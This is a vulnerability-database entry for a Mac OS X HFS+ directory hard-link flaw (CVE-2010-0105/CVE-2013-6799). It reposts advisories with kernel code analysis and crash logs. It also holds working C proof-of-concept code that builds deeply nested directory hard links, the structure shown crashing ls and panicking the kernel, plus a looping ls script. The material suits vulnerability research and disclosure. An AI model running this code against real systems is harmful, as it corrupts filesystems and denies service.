var-201004-0093
Vulnerability from variot

The hfs implementation in Apple Mac OS X 10.5.8 and 10.6.x before 10.6.5 supports hard links to directories and does not prevent certain deeply nested directory structures, which allows local users to cause a denial of service (filesystem corruption) via a crafted application that calls the mkdir and link functions, related to the fsck_hfs program in the diskdev_cmds component. Apple Mac OS X is prone to a local denial-of-service vulnerability. Exploiting this issue allows local, unprivileged users to crash the affected system, denying further service to legitimate users. Apple Mac OS X 10.6.2 and 10.6.3 are affected; other versions may also be vulnerable. Mac OS X is the operating system used on Apple's Macintosh computers.

MacOSX/XNU HFS Multiple Vulnerabilities
Maksymilian Arciemowicz
http://cxsecurity.com/
http://cifrex.org/

===================

On November 8th, I reported a vulnerability in hard links for HFS+ (CVE-2013-6799):

http://cxsecurity.com/issue/WLB-2013110059

The HFS+ file system does not apply strict privilege rules when creating hard links. The ability to create hard links to directories is wrongly implemented, and the issue affects OS versions greater than or equal to 10.5. Officially, Apple allows directory hard links only for Time Machine (see wiki). Vulnerability CVE-2013-6799 (incomplete fix for CVE-2010-0105) allows creating hard links to directories, and the number of such hard links may be arbitrarily high. To create N hard links you must use a specific algorithm that creates the links from the top of the filesystem tree: first create the directory structure, then walk it from the top down, creating a hard link at each level. Last time I mentioned the possibility of a kernel crash when running the 'ls' command; this situation occurs in conjunction with the 'find' application.
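The procedure just described (build the nested directories first, then hard-link each level from the top down), as an added C example written for this page; it is not the author's l2.c or test.c. The directory names D1..Dn, the link names H2..Hn, and the choice to link level k into the directory two levels above it are this example's own reading of the test.c transcript further down. link() on a directory only succeeds on a filesystem that permits directory hard links (an affected HFS+ volume); elsewhere it returns -1 with EPERM, which the code reports rather than hides.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* Added example, not the advisory's l2.c: "build the tree first, then link from
 * the top down", generalised to any depth. Names D1..Dn / H2..Hn are this
 * example's own choice. Where the filesystem refuses directory hard links
 * (Linux, or HFS+ after the fix) link() fails and that failure is reported. */

/* Write "base/D1/.../Ddepth" into out. Returns its length, or -1 if it does not fit. */
int nested_path(char *out, size_t outsz, const char *base, int depth)
{
    int n = snprintf(out, outsz, "%s", base);
    if (n < 0 || (size_t)n >= outsz)
        return -1;
    for (int i = 1; i <= depth; i++) {
        int m = snprintf(out + n, outsz - (size_t)n, "/D%d", i);
        if (m < 0 || (size_t)m >= outsz - (size_t)n)
            return -1;
        n += m;
    }
    return n;
}

/* Append "/H<k>" to the path already in buf. Returns 0, or -1 if it does not fit. */
static int append_link_name(char *buf, size_t bufsz, int k)
{
    size_t used = strlen(buf);
    int m = snprintf(buf + used, bufsz - used, "/H%d", k);
    return (m < 0 || (size_t)m >= bufsz - used) ? -1 : 0;
}

/* Phase 1: create base/D1/D2/.../Ddepth from the top. Returns how many levels
 * exist afterwards (created or pre-existing); stops at the first error. */
int create_chain(const char *base, int depth)
{
    char path[4096];
    int levels = 0;
    for (int i = 1; i <= depth; i++) {
        if (nested_path(path, sizeof path, base, i) < 0)
            break;
        if (mkdir(path, 0755) != 0 && errno != EEXIST)
            break;
        levels++;
    }
    return levels;
}

/* Phase 2: walk the chain top-down and hard-link level k into the directory
 * two levels above it: base/D1/../Dk -> base/D1/../D(k-2)/Hk, the sequence the
 * advisory's test.c transcript performs by hand. Returns the number of link()
 * calls that succeeded; *first_errno (if non-NULL) gets the first failure's errno. */
int link_chain_top_down(const char *base, int depth, int *first_errno)
{
    char src[4096], dst[4096];
    int linked = 0;
    if (first_errno)
        *first_errno = 0;
    for (int k = 2; k <= depth; k++) {
        if (nested_path(src, sizeof src, base, k) < 0 ||
            nested_path(dst, sizeof dst, base, k - 2) < 0 ||
            append_link_name(dst, sizeof dst, k) < 0)
            break;
        if (link(src, dst) == 0)
            linked++;
        else if (first_errno && *first_errno == 0)
            *first_errno = errno;
    }
    return linked;
}

/* Tear-down, deepest first: drop each Hk (tried as link, then as directory;
 * errors ignored since it may never have been created), then Dk, then base.
 * Returns 0 when base itself could be removed. */
int remove_chain(const char *base, int depth)
{
    char path[4096];
    for (int k = depth; k >= 1; k--) {
        if (k >= 2 && nested_path(path, sizeof path, base, k - 2) >= 0 &&
            append_link_name(path, sizeof path, k) == 0 && unlink(path) != 0)
            rmdir(path);
        if (nested_path(path, sizeof path, base, k) >= 0)
            rmdir(path);
    }
    return rmdir(base);
}

int main(int argc, char **argv)
{
    const char *base = argc > 1 ? argv[1] : "B";     /* same top name as the advisory's ls -laR B */
    int depth = argc > 2 ? atoi(argv[2]) : 8, err = 0;
    int levels = create_chain(base, depth);
    int linked = link_chain_top_down(base, levels, &err);
    printf("%d levels created, %d directory hard links made", levels, linked);
    if (err)
        printf(", first link() failure: %s", strerror(err));
    printf("\n");
    return 0;   /* tree left in place so ls -laR / find can be tried on it */
}
```

Run it only on a scratch volume or disk image: on an affected HFS+ system the tree it leaves behind is the kind of structure the advisory feeds to ls -laR and find. remove_chain() removes it again.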

Commands such as 'ls' behave in unexpected ways. Apple is going to find this crash point in the code. To create a huge hard-link structure, use this code:

http://cert.cx/stuff/l2.c


-----------------------------------
h1XSS:tysiak cx$ uname -a
Darwin 000000000000000.home 13.1.0 Darwin Kernel Version 13.1.0: Thu Jan 16 19:40:37 PST 2014; root:xnu-2422.90.20~2/RELEASE_X86_64 x86_64
h1xss:tysiak cx$ gcc -o l2 l2.c
h1xss:tysiak cx$ ./l2 1000
...
h1xss:tysiak cx$ cat loop.sh
#!/bin/bash
while [ 1 ] ; do
ls -laR B > /dev/null
done

h1xss:tysiak cx$ sh ./loop.sh
ls: B: No such file or directory
ls: X1: No such file or directory
...
ls: X8: Bad address
ls: X1: Bad address
ls: X2: Bad address
...
ls: X8: No such file or directory
./loop.sh: line 4:  8816 Segmentation fault: 11  ls -laR B > /dev/null
./loop.sh: line 4:  8818 Segmentation fault: 11  ls -laR B > /dev/null
ls: B: No such file or directory
ls: X1: No such file or directory
ls: X2: No such file or directory
...
ls: X1: No such file or directory
ls: X2: No such file or directory
-----------
...
-----------
Feb  9 21:16:38 h1xss.home ReportCrash[9419]: Saved crash report for ls[9418] version 230 to /Users/freak/Library/Logs/DiagnosticReports/ls_2014-02-09-211638_h1XSS.crash
-----------

What we can see here is unexpected behaviour of the ls command. The ls process is also affected by an infinite loop (recursion?).

-----------
h1xss:tysiak cx$ ps -fp 8822
  UID   PID  PPID   C STIME   TTY           TIME CMD
  501  8822  8810   0  7:36   ttys002   62:19.65 ls -laR B
-----------


or, run in parallel with a 'find . > /dev/null' command, causes a kernel crash:

-----------
Mon Mar 31 20:30:41 2014
panic(cpu 0 caller 0xffffff80044dbe2e): Kernel trap at 0xffffff8004768838, type 13=general protection, registers:
CR0: 0x0000000080010033, CR2: 0xffffff8122877004, CR3: 0x0000000001a5408c, CR4: 0x00000000001606e0
RAX: 0xffffff802bc148a0, RBX: 0xdeadbeefdeadbeef, RCX: 0x0000000000008000, RDX: 0x0000000000000000
RSP: 0xffffff8140d9b990, RBP: 0xffffff8140d9b9a0, RSI: 0x0000000000000018, RDI: 0xffffff802f23bcd0
R8:  0xffffff8140d9bc1c, R9:  0xffffff802f26e960, R10: 0xffffff8140d9ba2c, R11: 0x0000000000000f92
R12: 0xffffff801ba1a008, R13: 0xffffff8140d9bb20, R14: 0xffffff802f23bcd0, R15: 0xffffff802f26e960
RFL: 0x0000000000010282, RIP: 0xffffff8004768838, CS:  0x0000000000000008, SS:  0x0000000000000010
Fault CR2: 0xffffff8122877004, Error code: 0x0000000000000000, Fault CPU: 0x0

Backtrace (CPU 0), Frame : Return Address
0xffffff811eee8c50 : 0xffffff8004422fa9

BSD process name corresponding to current thread: ls
-----------

Note the RBX value 0xdeadbeefdeadbeef at the faulting instruction: 0xdeadbeef is the pattern XNU's zone allocator writes into freed elements, so the trap looks like a dereference of already-freed kernel memory rather than a plain NULL pointer.

XNU is the computer operating system kernel that Apple Inc. acquired and developed for use in the Mac OS X operating system and released as free and open source software as part of the Darwin operating system. We can try to look at the HFS implementation code. Let's start a static code analysis using the cifrex.org tool!

-1.--------------------------------------------------------- Unchecked Return Value to NULL Pointer Dereference in hfs_vfsops.c

Code: http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_vfsops.c

--- hfs_vfsops.c ----------------------------
/*
 * HFS filesystem related variables.
 */
int
hfs_sysctl(int *name, __unused u_int namelen, user_addr_t oldp, size_t *oldlenp,
           user_addr_t newp, size_t newlen, vfs_context_t context)
{
...
        if ((newlen <= 0) || (newlen > MAXPATHLEN))
            return (EINVAL);

        bufsize = MAX(newlen * 3, MAXPATHLEN);
        MALLOC(filename, char *, newlen, M_TEMP, M_WAITOK);
        if (filename == NULL) {                  <===== filename CHECK
            error = ENOMEM;
            goto encodinghint_exit;
        }
        MALLOC(unicode_name, u_int16_t *, bufsize, M_TEMP, M_WAITOK);
        if (filename == NULL) {                  <===== double CHECK?
            error = ENOMEM;
            goto encodinghint_exit;
        }

        error = copyin(newp, (caddr_t)filename, newlen);
        if (error == 0) {
            error = utf8_decodestr((u_int8_t *)filename, newlen - 1, unicode_name,
                                   &bytes, bufsize, 0, UTF_DECOMPOSED);
            if (error == 0) {
                hint = hfs_pickencoding(unicode_name, bytes / 2);
                error = sysctl_int(oldp, oldlenp, USER_ADDR_NULL, 0, (int32_t *)&hint);
            }
        }
--- hfs_vfsops.c ----------------------------

Checking 'filename' twice makes no sense; the second condition should probably check 'unicode_name', the allocation it immediately follows.

-2.--------------------------------------------------------- Possible Buffer Overflow in resource fork (hfs_vnops.c)

The unverified value returned by snprintf() may be larger than the declared buffer (MAXPATHLEN).

https://developer.apple.com/library/mac/documentation/Darwin/Reference/ManPages/man3/snprintf.3.html

The snprintf() and vsnprintf() functions will write at most n-1 of the characters printed into the output string (the n'th character then gets the terminating `\0'); if the return value is greater than or equal to the n argument, the string was too short and some of the printed characters were discarded. The output is always null-terminated.


Code: http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_vnops.c

--- hfs_vnops.c ----------------------------
...
/*
 * hfs_vgetrsrc acquires a resource fork vnode corresponding to the cnode that is
 * found in 'vp'. The rsrc fork vnode is returned with the cnode locked and iocount
 * on the rsrc vnode.
 * ...
 */
int
hfs_vgetrsrc(struct hfsmount *hfsmp, struct vnode *vp, struct vnode **rvpp,
             int can_drop_lock, int error_on_unlinked)
{
...
    /*
     * Supply hfs_getnewvnode with a component name.
     */
    cn.cn_pnbuf = NULL;
    if (descptr->cd_nameptr) {
        MALLOC_ZONE(cn.cn_pnbuf, caddr_t, MAXPATHLEN, M_NAMEI, M_WAITOK);
        cn.cn_nameiop = LOOKUP;
        cn.cn_flags = ISLASTCN | HASBUF;
        cn.cn_context = NULL;
        cn.cn_pnlen = MAXPATHLEN;
        cn.cn_nameptr = cn.cn_pnbuf;
        cn.cn_hash = 0;
        cn.cn_consume = 0;
        cn.cn_namelen = snprintf(cn.cn_nameptr, MAXPATHLEN,            <================
                                 "%s%s", descptr->cd_nameptr, _PATH_RSRCFORKSPEC);
    }
    dvp = vnode_getparent(vp);
    error = hfs_getnewvnode(hfsmp, dvp, cn.cn_pnbuf ? &cn : NULL,     <================
                            descptr, GNV_WANTRSRC | GNV_SKIPLOCK, &cp->c_attr,
                            &rsrcfork, &rvp, &newvnode_flags);
--- hfs_vnops.c ----------------------------

The format is '%s%s', and the combined length of descptr->cd_nameptr and _PATH_RSRCFORKSPEC may exceed the declared buffer size (MAXPATHLEN). descptr->cd_nameptr can be up to MAXPATHLEN bytes, and _PATH_RSRCFORKSPEC is

#define _PATH_RSRCFORKSPEC "/..namedfork/rsrc"

which is 17 characters long. snprintf() itself never writes past MAXPATHLEN, but its return value, stored in cn.cn_namelen, is the length the untruncated string would have had, up to 17 characters more than the buffer holds, and that length is passed on unchecked. Possible overflow of up to 17 characters here? (One caveat for anyone trying to reach it: HFS+ catalog names are limited to 255 UTF-16 units, at most 765 bytes in UTF-8, so the open question is whether a cd_nameptr can actually get close to MAXPATHLEN.)

Now let's look at the hfs_getnewvnode function:

http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_cnode.c

--- hfs_cnode.c ----------------------------
hfs_getnewvnode(
    struct hfsmount *hfsmp,
    struct vnode *dvp,
    struct componentname *cnp,                  <======== WATCH THIS
    struct cat_desc *descp,
    int flags,
    struct cat_attr *attrp,
    struct cat_fork *forkp,
    struct vnode **vpp,
    int *out_flags)
{
...
    if ((vpp != NULL) && (cnp)) {
        /* we could be requesting the rsrc of a hardlink file... */
        vnode_update_identity (*vpp, dvp, cnp->cn_nameptr, cnp->cn_namelen, cnp->cn_hash,   <== NAMELEN HERE
                               (VNODE_UPDATE_PARENT | VNODE_UPDATE_NAME));
...
--- hfs_cnode.c ----------------------------

and the call to vnode_update_identity():

http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/vfs/vfs_cache.c

--- vfs_cache.c ----------------------------
void
vnode_update_identity(vnode_t vp, vnode_t dvp, const char *name, int name_len,
                      uint32_t name_hashval, int flags)
{
...
    if ( (flags & VNODE_UPDATE_NAME) ) {
        if (name != vp->v_name) {
            if (name && *name) {
                if (name_len == 0)
                    name_len = strlen(name);
                tname = vfs_addname(name, name_len, name_hashval, 0);   <== NAMELEN HERE
            }
        } else
            flags &= ~VNODE_UPDATE_NAME;
    }
...
const char *
vfs_addname(const char *name, uint32_t len, u_int hashval, u_int flags)
{
    return (add_name_internal(name, len, hashval, FALSE, flags));      <== CALL
}
--- vfs_cache.c ----------------------------

And the invalid memory reference in add_name_internal():

--- vfs_cache.c ----------------------------
static const char *
add_name_internal(const char *name, uint32_t len, u_int hashval, boolean_t need_extra_ref,
                  __unused u_int flags)
{
    struct stringhead *head;
    string_t *entry;
    uint32_t chain_len = 0;
    uint32_t hash_index;
    uint32_t lock_index;
    char *ptr;

    /*
     * if the length already accounts for the null-byte, then
     * subtract one so later on we don't index past the end
     * of the string.
     */
    if (len > 0 && name[len-1] == '\0') {      <===== INVALID MEMORY REFERENCE
        len--;
    }
    if (hashval == 0) {
        hashval = hash_string(name, len);
    }
...
--- vfs_cache.c ----------------------------
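The length bug traced through the hfs_vgetrsrc, hfs_getnewvnode, vnode_update_identity and add_name_internal snippets above, as an added, self-contained C example; this is not XNU code. rsrc_name_unsafe() mirrors the hfs_vgetrsrc pattern of trusting snprintf()'s return value as the stored length, rsrc_name_safe() is the hardened form, and last_byte_index_in_bounds() stands in for the name[len-1] access in add_name_internal(). BUF_LEN (32) is a scaled-down stand-in for MAXPATHLEN so the truncating case is easy to hit; the suffix is the real _PATH_RSRCFORKSPEC. The sample names are constructed.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>

/* Added example, not XNU code: the snprintf() length-propagation bug from the
 * hfs_vgetrsrc -> hfs_getnewvnode -> vnode_update_identity -> add_name_internal
 * chain, beside a hardened variant. BUF_LEN is a scaled-down stand-in for
 * MAXPATHLEN (1024); RSRC_SUFFIX is the real _PATH_RSRCFORKSPEC, 17 chars. */
#define BUF_LEN 32
#define RSRC_SUFFIX "/..namedfork/rsrc"

/* Vulnerable pattern (cn.cn_namelen = snprintf(...)): the return value is the
 * length the untruncated string would have had, not the number of bytes that
 * ended up in buf. For a long enough name it exceeds BUF_LEN - 1. */
size_t rsrc_name_unsafe(char buf[BUF_LEN], const char *name)
{
    return (size_t)snprintf(buf, BUF_LEN, "%s%s", name, RSRC_SUFFIX);
}

/* Hardened pattern: truncation is an error (ENAMETOOLONG), and the length
 * handed to the caller is always the number of bytes really stored in buf. */
int rsrc_name_safe(char buf[BUF_LEN], const char *name, size_t *len_out)
{
    int n = snprintf(buf, BUF_LEN, "%s%s", name, RSRC_SUFFIX);
    if (n < 0)
        return EINVAL;
    if ((size_t)n >= BUF_LEN) {
        buf[0] = '\0';
        *len_out = 0;
        return ENAMETOOLONG;
    }
    *len_out = (size_t)n;
    return 0;
}

/* Stand-in for the first thing add_name_internal() does with the length,
 * name[len-1]: report whether that index lies inside a BUF_LEN buffer,
 * without performing the read. */
int last_byte_index_in_bounds(size_t len)
{
    return len > 0 && len - 1 < BUF_LEN;
}

/* 1 if the unsafe length for this name would send add_name_internal()'s
 * name[len-1] past the end of the buffer, 0 otherwise. */
int unsafe_len_overruns(const char *name)
{
    char buf[BUF_LEN];
    return !last_byte_index_in_bounds(rsrc_name_unsafe(buf, name));
}

int main(void)
{
    /* constructed inputs: one that fits, one that overruns after truncation */
    const char *names[] = { "a", "12345678901234567890" };
    for (size_t i = 0; i < sizeof names / sizeof names[0]; i++) {
        char buf[BUF_LEN];
        size_t safe_len = 0;
        size_t unsafe_len = rsrc_name_unsafe(buf, names[i]);
        size_t stored = strlen(buf);
        int rc = rsrc_name_safe(buf, names[i], &safe_len);
        printf("%-22s unsafe len=%zu (stored %zu) overruns=%d | safe rc=%d len=%zu\n",
               names[i], unsafe_len, stored, unsafe_len_overruns(names[i]), rc, safe_len);
    }
    return 0;
}
```

The fix is the caller's, not snprintf()'s: either reject a result of MAXPATHLEN or more as ENAMETOOLONG, as rsrc_name_safe() does, or clamp cn_namelen to the bytes actually stored before it reaches vnode_update_identity().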

-3.--------------------------------------------------------- Unchecked Return Value to NULL Pointer Dereference in hfs_catalog.c and elsewhere

Please note that a buffer length check (stored in some variable) should be performed; also, the return value of the *alloc() function family should be verified for possible NULL pointers. Here are a few examples (possibly false positives).

http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_catalog.c

--- hfs_catalog.c ----------------------------
/*
 * builddesc - build a cnode descriptor from an HFS+ key
 */
static int
builddesc(const HFSPlusCatalogKey *key, cnid_t cnid, u_int32_t hint, u_int32_t encoding,
          int isdir, struct cat_desc *descp)
{
    int result = 0;
    unsigned char * nameptr;
    size_t bufsize;
    size_t utf8len;
    unsigned char tmpbuff[128];

    /* guess a size... */
    bufsize = (3 * key->nodeName.length) + 1;
    if (bufsize >= sizeof(tmpbuff) - 1) {                            <============================
        MALLOC(nameptr, unsigned char *, bufsize, M_TEMP, M_WAITOK);   <= MALLOC FAIL
    } else {
        nameptr = &tmpbuff[0];
    }

    result = utf8_encodestr(key->nodeName.unicode,
            key->nodeName.length * sizeof(UniChar),
            nameptr, (size_t *)&utf8len,                               <============================
...
    maxlinks = MIN(entrycnt, (u_int32_t)(uio_resid(uio) / SMALL_DIRENTRY_SIZE));
    bufsize = MAXPATHLEN + (maxlinks * sizeof(linkinfo_t)) + sizeof(*iterator);
    if (extended) {
        bufsize += 2*sizeof(struct direntry);
    }
    MALLOC(buffer, void *, bufsize, M_TEMP, M_WAITOK);                <============================
    bzero(buffer, bufsize);
...
        FREE(nameptr, M_TEMP);
        MALLOC(nameptr, unsigned char *, bufsize, M_TEMP, M_WAITOK);   <==============
        result = utf8_encodestr(key->nodeName.unicode,
                key->nodeName.length * sizeof(UniChar),
                nameptr, (size_t *)&utf8len, bufsize, ':', 0);
    }
...
    cnp = (const CatalogName *)&ckp->hfsPlus.nodeName;
    bufsize = 1 + utf8_encodelen(cnp->ustr.unicode,
                                 cnp->ustr.length * sizeof(UniChar), ':', 0);
    MALLOC(new_nameptr, u_int8_t *, bufsize, M_TEMP, M_WAITOK);       <========
    result = utf8_encodestr(cnp->ustr.unicode,
                            cnp->ustr.length * sizeof(UniChar),
                            new_nameptr, &tmp_namelen, bufsize, ':', 0);
--- hfs_catalog.c ----------------------------

The above examples do not look good either. Is the crux of the application and kernel crashes among them? I informed Apple of these possible errors; more than a month has passed and I still have not received any comment or solution.

--- 1. References ---
http://cxsecurity.com/issue/WLB-2014040027
http://cxsecurity.com/cveshow/CVE-2013-6799/
http://cxsecurity.com/cveshow/CVE-2010-0105/

--- 2. Greetz ---
Kacper, George and Michal

--- 3. Credit ---
Maksymilian Arciemowicz
http://cxsecurity.com/
http://cifrex.org/
http://cert.cx/

Best regards,
CXSEC TEAM
http://cxsec.org/

Apple MacOSX 10.9 Hard Link Memory Corruption

Date: 08.11.2013
http://cxsecurity.com/
http://cvemap.org/

URL: http://cxsecurity.com/issue/WLB-2013110059

--- 1. Description ---

In most UNIX-like systems a hard link to a directory is reserved for the root user, where it is possible at all. In Mac OS X 10.6 there was one such vulnerability (CVE-2010-0105), in which the creation of many hard links left the filesystem corrupted. Wikipedia states: 'A notable exception to this is Mac OS X v10.5 (Leopard) and newer, which use hard links on directories for the Time Machine backup mechanism only.'

'Only for Time Machine' is not true. Let's see a quick PoC.

A plain program performing the link system call:

mac-cxs-XK:pochd XK$ cat test.c

#include <stdio.h>
#include <unistd.h>

void usage(const char *program)
{
    const char *message = " [src_dir] [target_dir]";
    fprintf(stderr, "%s%s\n", program, message);
}

int main(int argc, char *argv[])
{
    if (argc != 3) {
        usage(argv[0]);
        return 1;
    }

    /* link(2) on a directory: succeeds only where the filesystem permits directory hard links */
    int ret = link(argv[1], argv[2]);

    fprintf(stderr, "link(3) return= %d\n", ret);

    return ret;
}

mac-cxs-XK:pochd XK$ gcc -o test test.c
mac-cxs-XK:pochd XK$ ls
test	test.c
mac-cxs-XK:pochd XK$ mkdir DIR1
mac-cxs-XK:pochd XK$ ./test DIR1 Hardlink1
link(3) return= -1
mac-cxs-XK:pochd XK$ mkdir DIR1/DIR2
mac-cxs-XK:pochd XK$ ./test DIR1/DIR2 Hardlink2
link(3) return= 0
mac-cxs-XK:pochd XK$ cd DIR1
mac-cxs-XK:DIR1 XK$ mkdir DIR2/DIR3
mac-cxs-XK:DIR1 XK$ ../test DIR2/DIR3 Hardlink3
link(3) return= 0
mac-cxs-XK:DIR1 XK$ cd DIR2
mac-cxs-XK:DIR2 XK$ mkdir DIR3/DIR4
mac-cxs-XK:DIR2 XK$ ../../test DIR3/DIR4 Hardlink4
link(3) return= -1


Hardlink1 and Hardlink4 failed, whereas Hardlink2 and Hardlink3 succeeded; so what may be the cause? In my opinion we should recognise it as a security flaw, and if Apple is not going to fix this vulnerability then someone should at least correct Wikipedia.

The operation (functionality) of hard links differs from that described in the book "Unix Internals: The New Frontiers" (by Uresh Vahalia). Old UNIX standards simply prevent any user (root included) from creating a hard link to any directory.

Is that a new CWE design-error vulnerability or a new UNIX style?

There may be many possible bad consequences of wrong 'hard link' handling. We will not yet publish a full description of this problem, but we do know that it exists and that it may exhaust kernel/system resources and cause application crashes or kernel panics. Let's wait for the new MacOSX version.

A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A:
total 0
Process 14413 stopped
* thread #1: tid = 0x90ba, 0x00007fff948f7812 libsystem_c.dylib`strlen + 18, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0xffb21290)
    frame #0: 0x00007fff948f7812 libsystem_c.dylib`strlen + 18
libsystem_c.dylib`strlen + 18:
-> 0x7fff948f7812:  pcmpeqb (%rdi), %xmm0
   0x7fff948f7816:  pmovmskb %xmm0, %esi
   0x7fff948f781a:  andq   $15, %rcx
   0x7fff948f781e:  orq    $-1, %rax
(lldb)
(lldb) bt
* thread #1: tid = 0x90ba, 0x00007fff948f7812 libsystem_c.dylib`strlen + 18, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0xffb21290)
    frame #0: 0x00007fff948f7812 libsystem_c.dylib`strlen + 18
..

Does the kernel panic correspond to 'ls'? More details soon.

--- Credit ---
Maksymilian Arciemowicz ( http://cert.cx/ )

First CVE & CWE compatible bugtraq
http://cxsecurity.com/
http://cvemap.org/



{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201004-0093",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apple",
        "version": "10.6.3"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apple",
        "version": "10.6.2"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apple",
        "version": "10.6.4"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apple",
        "version": "10.6.1"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apple",
        "version": "10.5.8"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apple",
        "version": "10.6.0"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "apple",
        "version": "v10.5.8"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "apple",
        "version": "v10.6 to  v10.6.4"
      },
      {
        "model": "mac os x server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "apple",
        "version": "v10.5.8"
      },
      {
        "model": "mac os x server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "apple",
        "version": "v10.6 to  v10.6.4"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.6"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.6"
      },
      {
        "model": "mac os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.6.5"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.6.1"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5.6"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5.3"
      },
      {
        "model": "mac os server",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.6.5"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.6.1"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5.6"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5.3"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5.8"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5.5"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5.8"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5.5"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5.4"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.6.2"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5.7"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5.4"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.6.2"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5.2"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5.1"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5.7"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5.2"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.5.1"
      },
      {
        "model": "mac os",
